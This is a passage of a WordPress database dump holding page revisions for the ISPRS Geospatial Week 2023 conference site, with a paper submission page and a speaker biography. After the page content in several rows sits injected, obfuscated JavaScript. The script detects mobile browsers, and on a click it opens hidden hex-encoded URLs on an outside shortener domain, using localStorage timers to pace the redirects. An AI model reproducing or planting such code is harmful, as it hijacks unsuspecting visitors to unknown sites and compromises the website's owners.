Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-04-19 11:12:11','2023-04-19 11:12:11','',2638,'https://gsw2023.com/?p=4069',0,'revision','',0),
(4070,1,'2023-04-19 11:16:27','2023-04-19 11:16:27','<p>[vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Submit Abstracts/Papers</strong></span></p>\n<p>&nbsp;</p>\n<p>The ISPRS Geospatial Week 2023 (GSW’2023) has been opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2023\"> ConfToool website of the Geospatial Week</a>, authors can submit either a full paper or an extended abstract to one of the 26 Workshops available in GSW’2023</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">ISPRS reviewing process</a>. <strong>Note that Full papers should be submitted anonymously</strong><strong>. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</strong></p>\n<p>&nbsp;</p>\n<p>Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\">ISPRS Archives</a>.</p>\n<div class=\"three_quarter first\">\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><span style=\"font-size: 14pt;\"><strong>Important Dates:</strong></span></p>\n<ol>\n<li><span style=\"font-size: 12pt;\"><strong> Annals (Fully Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></li>\n<li>Camera ready paper submission: June 15, 2023 <span style=\"text-decoration: line-through;\">June 1, 2023</span></li>\n<li><strong>Priority well be given to early Submissions</strong></li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><span style=\"font-size: 12pt;\"><strong> Archives (Abstract Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): <del>April 15, 2023</del> , May 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: May <del>15, 2023</del>, May 21, 2023</li>\n<li>Camera ready paper submission: <del>June 1, 2023</del>, June 15, 2023</li>\n<li></li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration deadlines</strong></span></p>\n<ul>\n<li>Early bird registration deadline:<del>June 1, 2023</del>, June 15, 2023</li>\n<li>Late registration deadline: July 15, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><strong><span style=\"font-size: 14pt;\">Useful links:</span></strong></p>\n<p><a href=\"https://www.conftool.com/gsw2023\">ConfToool website of the Geospatial Week2023</a></p>\n<p><a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">Guidelines for Authors</a></p>\n<p><a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">Reviewing process for ISPRS Events</a></p>\n<p>&nbsp;</p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-04-19 11:16:27','2023-04-19 11:16:27','',2659,'https://gsw2023.com/?p=4070',0,'revision','',0),
(4071,1,'2023-04-19 22:28:15','2023-04-19 22:28:15','<!-- wp:cover {\"overlayColor\":\"white\",\"isDark\":false} -->\n<div class=\"wp-block-cover is-light\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-white-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph -->\n<p><strong>Head of Computer Engineering Departments, Arab Academy for Science, Technology and Maritime Transport (AASTMT).</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>The Chair of IEEE Egypt WIE, Egypt Section – region 8</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Sherin Youssef received her PhD degree from University of Nottingham UK, 2004, in Computer Intelligent Systems. She received her MSc degree from University of Alexandria, Egypt, in 1997. She is currently the head of computer engineering departments at Arab Academy for Science and Technology. She is an IEEE Senior member and the Chair of IEEE \"Women In Engineering\" Egypt Section - region 8 (2023-2024). In 2021-2022, she has been selected as the Chair of IEEE WIE Alex Subsection. She is a senior member of many International Advisory boards, technical committees and international/regional steering committees. As per ISPRS Technical Commission 2016-2022, she has been the Co-Chair of Working Group WG I/7 on \"Mobile Mapping Technology\", and key support personnel of WG I/6 on \"Multi-sensor Integration and Fusion\". She is the Co-Chair of the international conferences of Advanced Technology &amp; Applied Sciences ICaTAS (2016-2023), and has been the program chair of the International conference on Mobile Mapping Technology (MMT 2017). She is participated as a keynote speaker in many International conferences and workshops, leading research innovations in many tracks related to artificial intelligence, green technology, internet of things (IoT) and digital transformation advances. In cooperation with Arab Organization and Egyptian National Commission for Education, Science and Culture (UNESCO - ALECSO), she has participated in workshops related to big data analytics for realizing sustainable development goals and green technology. She is Leading many programs and workshops in women empowerment and leadership in career development in cooperation with national and international organizations and Arab Women Association. She published in excess of 130 papers referred in top ranked international journals, conferences, lecture notes and workshops. She is leading many research groups in Artificial intelligence, virtual and augmented reality, smart assistive technology, Mobile development, Video surveillance, Biomedical Engineering, intelligent robotics, Video &amp; Image processing, machine learning, and smart autonomous systems. She has advised/supervised more than 60 students for their Master and PhD degrees and has many joint research projects with highly-ranked international universities. Currently working on various projects related to academia &amp; industry and leading many regional and international</p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new 